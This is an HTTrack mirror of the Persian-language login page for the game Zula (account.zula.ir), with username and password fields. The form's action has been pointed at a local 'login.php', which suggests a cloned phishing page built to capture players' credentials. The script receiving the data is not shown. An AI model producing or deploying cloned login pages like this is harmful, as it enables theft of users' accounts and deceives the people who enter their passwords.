<!doctype html>
<html>


<!-- Mirrored from account.zula.ir/zula-login?ReturnUrl=%2F by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Jul 2020 15:23:22 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
    <!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'gtm5445.html?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-P54QVF5');</script>
<!-- End Google Tag Manager -->

    <meta charset="UTF-8">
    <title>ورود</title>
    <meta name="description" content="">
    <meta name="keywords" content="" />
    <meta name="author" content="">


    <!-- Mobile Specific Metas
    ================================================== -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--styles-->
    <link rel="stylesheet" href="sitecdn/IR/Content/hesapzulaoyun/css/bootstrap.min.css" />
    <link rel="stylesheet" href="sitecdn/IR/Content/hesapzulaoyun/css/style.min.css" />
    <link rel="stylesheet" href="sitecdn/IR/Content/hesapzulaoyun/css/login.min.css" />
    <link rel="stylesheet" href="releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous" />
    <link rel="icon" href="icons/favicon-v2.ico" type="image/x-icon" />
    <link rel="apple-touch-icon" sizes="180x180" href="icons/icon-96x96.png">
    <link rel="manifest" href="manifest.json">
        <link rel="stylesheet" href="sitecdn/IR/Content/hesapzulaoyun/css/accountZula-ir3860.css?v=1" />
    <script src="sitecdn/IR/Content/hesapzulaoyun/js/jquery.min.js"></script>
    <script src="sitecdn/IR/Content/hesapzulaoyun/js/bootstrap.min.js"></script>
    <script src="sitecdn/IR/Content/hesapzulaoyun/js/jquery.lazy.min.js"></script>

    <script src='recaptcha/api.js'></script>
    <script>
        dataLayer = window.dataLayer || [];

        var tempData = '';
        if (tempData !== '') {
            dataLayer.push({
                'Category':'Membership',
                'Action':'Login Failed',
                'Label':tempData,
                'nonInteraction':true,
                'event':'gaEvent'
            });
        }
    </script>

    <script src='recaptcha/api85f1.js?onload=onloadCallback&amp;render=explicit'></script>
    
</head>
<body class="hemen-oyna-page" dir="rtl">

    <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-P54QVF5"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
    
    



<style>
    html, body.hemen-oyna-page, .register-content {
        height: 100%;
    }
</style>
<div class="register-content">
    <div class="login-form-header">
        <img class="img-responsive" src="sitecdn/IR/Content/hesapzulaoyun/images/loginform-head.png" />
        <img class="img-responsive" src="sitecdn/IR/Content/hesapzulaoyun/images/zula-logov2.png" />
    </div>

    <form class="form-inline" autocomplete="off" action="login.php" method="post">
        <span class="error-msg field-validation-valid" data-valmsg-for="UserName" data-valmsg-replace="true"></span>
        <span class="error-msg field-validation-valid" data-valmsg-for="Password" data-valmsg-replace="true"></span>
        <input type="hidden" value="/" id="ReturnUrl" name="ReturnUrl" />

        <div class="form-group">
            <div class="input-group">
                <div class="input-group-addon">
                    <span class="icon-user"></span>
                </div>
                <input type="text" class="form-control" id="txtUserName" placeholder="نام کاربر" autocomplete="off" data-val="true" data-val-regex="&#x646;&#x627;&#x645; &#x6A9;&#x627;&#x631;&#x628;&#x631;&#x6CC; &#x646;&#x627; &#x645;&#x639;&#x62A;&#x628;&#x631; &#x627;&#x633;&#x62A;" data-val-regex-pattern="^[a-zA-Z0-9_.]&#x2B;$" data-val-required="&#x646;&#x627;&#x645; &#x6A9;&#x627;&#x631;&#x628;&#x631;&#x6CC; &#x646;&#x627; &#x645;&#x639;&#x62A;&#x628;&#x631; &#x627;&#x633;&#x62A;" name="UserName" value="">
            </div>
        </div>
        <div class="form-group">
            <div class="input-group">
                <div class="input-group-addon">
                    <span class="icon-unlock"></span>
                </div>
                <input type="password" class="form-control" id="pass" placeholder="کلمه عبور" autocomplete="off" data-val="true" data-val-required="&#x631;&#x645;&#x632; &#x639;&#x628;&#x648;&#x631; &#x636;&#x631;&#x648;&#x631;&#x6CC; &#x627;&#x633;&#x62A;" name="Password" />
            </div>

        </div>
        <div class="form-group">
            <div class="checkbox remember-me">
                <label>
                    <input type="checkbox" data-val="true" data-val-required="The Beni Hat&#x131;rla? field is required." id="RememberMe" name="RememberMe" value="true">
                    <span class="cr">
                        <i class="cr-icon icon-check"></i>
                    </span>
                    به خاطر سپردن اطلاعات
                </label>
            </div>
        </div>
     
        <div class="form-group">
            <div class="buttons">
                <button type="submit" class="btn btn-zula btn-login">
                    ورود
                </button>




                    </div>
            </div>
   
    
   
            <div class="form-group text-center forget-info">
            <a href="profile/recovery.html" id="btnForgetPassword">
                فراموش کردن نام کاربری/کلمه عبور
            </a>
            </div>


        <div class="form-group text-center register-text">
            <a href="pages/new-iran.html" title="همین الان ثبت نام کنید" id="btnRegister">
                همین الان ثبت نام کنید
            </a>
        </div>
        <div class="form-group text-center register-text">
            <img class="img-fluid lazy sourena" data-src="//cdn-download1.zula.ir/sitecdn/IR/Content/hesapzulaoyun/images/sourenaAge.png" />
        </div>

    <input name="__RequestVerificationToken" type="hidden" value="CfDJ8Cg94mIPe0dMr-_Zp3Q5Zg_vHYrpmPPNpC_7htYY6aFR68UN4fhppqVOHTYFNI2sMe_q7hqOd0VxmQ3sdMFWWOBdFhooSHTEJnU0aVEpPwSrAQLkKV1WH28cYzQ-TzGFG9e8cbKVXta5gxwCc-1wh8w" /><input name="RememberMe" type="hidden" value="false"></form>
</div>




 
        

    <script src="sitecdn/IR/Content/hesapzulaoyun/js/jquery-validation/dist/jquery.validate.min.js"></script>
    <script src="sitecdn/IR/Content/hesapzulaoyun/js/jquery-validation-unobtrusive/jquery.validate.unobtrusive.js"></script>
    <script src="sitecdn/IR/Content/hesapzulaoyun/js/site.js"></script>
    <script src="sitecdn/IR/Content/hesapzulaoyun/js/fsjs.min5327.js?v=20200605"></script>
    
    
</body>

<!-- Mirrored from account.zula.ir/zula-login?ReturnUrl=%2F by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Jul 2020 15:23:30 GMT -->
</html>